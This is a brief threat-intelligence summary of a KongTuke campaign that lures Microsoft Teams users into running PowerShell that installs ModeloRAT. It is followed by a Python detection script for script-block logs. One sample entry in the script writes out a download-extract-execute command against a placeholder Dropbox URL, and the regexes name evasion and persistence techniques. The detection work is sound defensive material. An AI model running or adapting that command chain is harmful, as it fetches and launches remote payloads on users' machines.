KongTuke has shifted to Microsoft Teams to carry out social engineering attacks, tricking employees into running a malicious PowerShell command that installs ModeloRAT and can establish persistent access in under five minutes. ReliaQuest says the campaign uses rotating Microsoft 365 tenants, Unicode display-name tricks, and stronger persistence features, making it harder to block and remove. #KongTuke #MicrosoftTeams #ModeloRAT #ReliaQuest
Key points
- KongTuke is now using Microsoft Teams for initial access.
- Victims are tricked into running a malicious PowerShell command.
- The command downloads a ZIP archive from Dropbox and installs ModeloRAT.
- The campaign can achieve persistent access in under five minutes.
- ModeloRAT includes improved C2, multiple access paths, and stronger persistence.
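As an added illustration from a detection standpoint (this is example code, not part of the original post or of ReliaQuest's report), the Python script below scores PowerShell script-block log entries against the chain summarised above: a download cmdlet, a file-sharing host such as Dropbox, archive expansion, launch from a temporary path, plus optional evasion flags and persistence commands. The indicator names, weights and threshold are this example's own choices, the sample log entries are constructed, the Dropbox URL is a placeholder, and nothing here is tied to a real ModeloRAT indicator.

```python
import re
from typing import Dict, List, Tuple

# Indicator name -> regex. Each covers one stage of the chain described above.
# Names and weights are choices made for this example, not identifiers from
# the ReliaQuest report.
INDICATORS: Dict[str, re.Pattern] = {
    "download_cmdlet": re.compile(
        r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Start-BitsTransfer)\b"
        r"|DownloadString|DownloadFile|Net\.WebClient", re.I),
    "file_sharing_host": re.compile(r"dropbox(usercontent)?\.com", re.I),
    "archive_expand": re.compile(
        r"Expand-Archive|ZipFile\]::ExtractToDirectory", re.I),
    "launch": re.compile(r"\b(Start-Process|Invoke-Expression|iex)\b", re.I),
    "temp_staging": re.compile(r"\$env:TEMP|\\AppData\\Local\\Temp\\", re.I),
    "evasion_flags": re.compile(
        r"-(WindowStyle\s+Hidden|EncodedCommand|ExecutionPolicy\s+Bypass)\b", re.I),
    "persistence": re.compile(
        r"Register-ScheduledTask|schtasks|CurrentVersion\\Run", re.I),
}

# Threshold chosen for this example; tune it against your own baseline.
SUSPICION_THRESHOLD = 3


def score_script_block(text: str) -> Tuple[int, List[str]]:
    """Return (score, matched indicator names) for one script-block log entry."""
    hits = [name for name, pattern in INDICATORS.items() if pattern.search(text)]
    return len(hits), hits


def is_suspicious(text: str, threshold: int = SUSPICION_THRESHOLD) -> bool:
    """A lone download is routine; download plus staging, expansion and launch is not."""
    score, hits = score_script_block(text)
    return "download_cmdlet" in hits and score >= threshold


def triage(blocks: List[str]) -> List[dict]:
    """Score every entry and return only the ones that cross the threshold."""
    flagged = []
    for idx, text in enumerate(blocks):
        score, hits = score_script_block(text)
        if is_suspicious(text):
            flagged.append({"index": idx, "score": score, "indicators": hits})
    return flagged


# Constructed sample entries standing in for PowerShell script-block logs
# (Event ID 4104 style). None is real telemetry; the Dropbox URL is a placeholder.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB",
    "Invoke-WebRequest -Uri https://www.dropbox.com/PLACEHOLDER/archive.zip "
    "-OutFile $env:TEMP\\a.zip; Expand-Archive $env:TEMP\\a.zip "
    "-DestinationPath $env:TEMP\\a -Force; Start-Process $env:TEMP\\a\\update.exe",
    "Invoke-WebRequest -Uri https://example.invalid/installer.msi -OutFile installer.msi",
]

if __name__ == "__main__":
    for entry in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"script block #{entry['index']}: score {entry['score']} "
              f"({', '.join(entry['indicators'])})")
```

Feeding real script-block logs through `triage` requires script-block logging to be enabled on the endpoints; the `download_cmdlet` requirement keeps ordinary `Expand-Archive` or scheduled-task administration from tripping the rule on its own, which is the main source of noise in this kind of heuristic.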